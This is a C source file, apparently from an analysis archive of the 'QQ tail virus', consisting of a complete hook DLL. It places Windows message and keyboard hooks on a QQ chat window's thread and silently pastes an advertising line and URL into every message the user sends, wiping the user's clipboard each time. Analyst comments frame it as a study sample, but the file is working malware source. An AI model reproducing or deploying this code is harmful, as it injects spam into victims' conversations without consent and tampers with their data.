www.pudn.com > “QQ尾巴病毒”分析源代码.zip > Hook.c
// Hook DLL from a published analysis sample: it installs two thread-scoped
// Windows hooks on the thread that owns a given chat window and, whenever the
// user sends a message, pastes a fixed advertising line (the "tail") into the
// message edit control first.
//
// Analyst notes (all visible in this file):
//   - a PE section named "shared" linked as read/write/shared,
//   - SetWindowsHookEx with WH_CALLWNDPROC and WH_KEYBOARD against a thread id
//     obtained from a window handle,
//   - the clipboard is emptied and overwritten on every send, so the user's
//     own clipboard contents are lost.

#include // NOTE(review): header name lost in page extraction; presumably <windows.h>, which declares the Win32 API used below
#define QQTAILAPI __declspec(dllexport) // defined before Hook.h; presumably Hook.h uses it to mark the exported functions (header not shown)
#include "Hook.h"

// Shared data section: the three handles below are placed in a section that
// the linker directive marks read/write/shared (rws), so every process that
// loads this DLL sees the same values.
#pragma data_seg("shared")
HHOOK g_hProc = NULL; // handle of the WH_CALLWNDPROC hook
HHOOK g_hKey = NULL;  // handle of the WH_KEYBOARD hook
HWND g_hRich = NULL;  // handle of the message text box
#pragma data_seg()
#pragma comment(linker, "/section:shared,rws")

// Module handle of this DLL, recorded in DllMain and passed to SetWindowsHookEx.
HINSTANCE g_hInstDLL = NULL;

// The "tail": the text pasted into the text box before each send.
TCHAR g_str[] = "欢迎来我的小站坐坐:http://titilima.nease.net";

// Puts g_str on the clipboard as CF_TEXT and sends WM_PASTE to hRich.
//
// hRich: window that receives the WM_PASTE message.
//
// No return value of the allocation or clipboard calls is checked.
void PasteText(HWND hRich)
{
    HGLOBAL hMem;
    LPTSTR pStr;

    // Allocate a movable, zero-initialised global block sized for g_str
    // (sizeof includes the terminator) and copy the string into it.
    hMem = GlobalAlloc(GHND | GMEM_SHARE, sizeof(g_str));
    pStr = GlobalLock(hMem);
    lstrcpy(pStr, g_str);
    GlobalUnlock(hMem);

    OpenClipboard(NULL);
    EmptyClipboard(); // discards whatever the user had on the clipboard
    // Set the clipboard text.
    SetClipboardData(CF_TEXT, hMem);
    CloseClipboard();

    // Release the memory block.
    // NOTE(review): per the Win32 documentation the system owns the handle
    // once SetClipboardData succeeds; this code frees it regardless.
    GlobalFree(hMem);

    // Paste the text into the target window.
    SendMessage(hRich, WM_PASTE, 0, 0);
}

// WH_CALLWNDPROC hook procedure: watches for the "Send" command message.
//
// lParam is read as a CWPSTRUCT describing the message being delivered.
// nCode is not examined before the structure is used; the call is always
// forwarded to the next hook in the chain.
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    CWPSTRUCT *p = (CWPSTRUCT *)lParam;

    // Catch the "Send" button: a WM_COMMAND whose control/command id is 1.
    if (p->message == WM_COMMAND && LOWORD(p->wParam) == 1)
        PasteText(g_hRich);

    return CallNextHookEx(g_hProc, nCode, wParam, lParam);
}

// WH_KEYBOARD hook procedure: watches for the "Send" hot key (Ctrl+Enter).
//
// nCode is not examined; the call is always forwarded to the next hook.
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    // Catch the hot key: Enter while Ctrl is held down. lParam >= 0 tests the
    // sign bit, which for a 32-bit LPARAM is bit 31, the key-transition flag
    // (clear while the key is being pressed) - assumes a 32-bit build.
    if (wParam == VK_RETURN && GetAsyncKeyState(VK_CONTROL) < 0 && lParam >= 0)
        PasteText(g_hRich);

    return CallNextHookEx(g_hKey, nCode, wParam, lParam);
}

// Installs or removes the two hooks.
//
// hQQ: top-level window whose owning thread is hooked; NULL removes the hooks.
// Returns TRUE when both hooks were installed (or both removed), else FALSE.
//
// Analyst note: when the target thread belongs to another process, Windows
// maps the hook DLL into that process, so an unexpected module load in the
// chat client is the observable trace of this call.
BOOL WINAPI SetHook(HWND hQQ)
{
    BOOL bRet = FALSE;

    if (hQQ != NULL)
    {
        DWORD dwThreadID = GetWindowThreadProcessId(hQQ, NULL);

        // Thanks to my friend hottey for the lookup code, which saved me the
        // trouble of using Spy++.
        // The text box is taken to be the first child of the dialog item
        // whose id is 0.
        g_hRich = GetWindow(GetDlgItem(hQQ, 0), GW_CHILD);
        if (g_hRich == NULL)
            return FALSE;

        // Install both hooks on the window's thread only (not system-wide).
        g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);
        g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);
        bRet = (g_hProc != NULL) && (g_hKey != NULL);
    }
    else
    {
        // Remove the hooks. The && short-circuits, so the keyboard hook is
        // only unhooked when removing the first hook succeeded.
        bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);
        g_hProc = NULL;
        g_hKey = NULL;
        g_hRich = NULL;
    }

    return bRet;
}

// DLL entry point: records the module handle on process attach so that
// SetHook can pass it to SetWindowsHookEx. Always reports success.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH)
        g_hInstDLL = hinstDLL;

    return TRUE;
}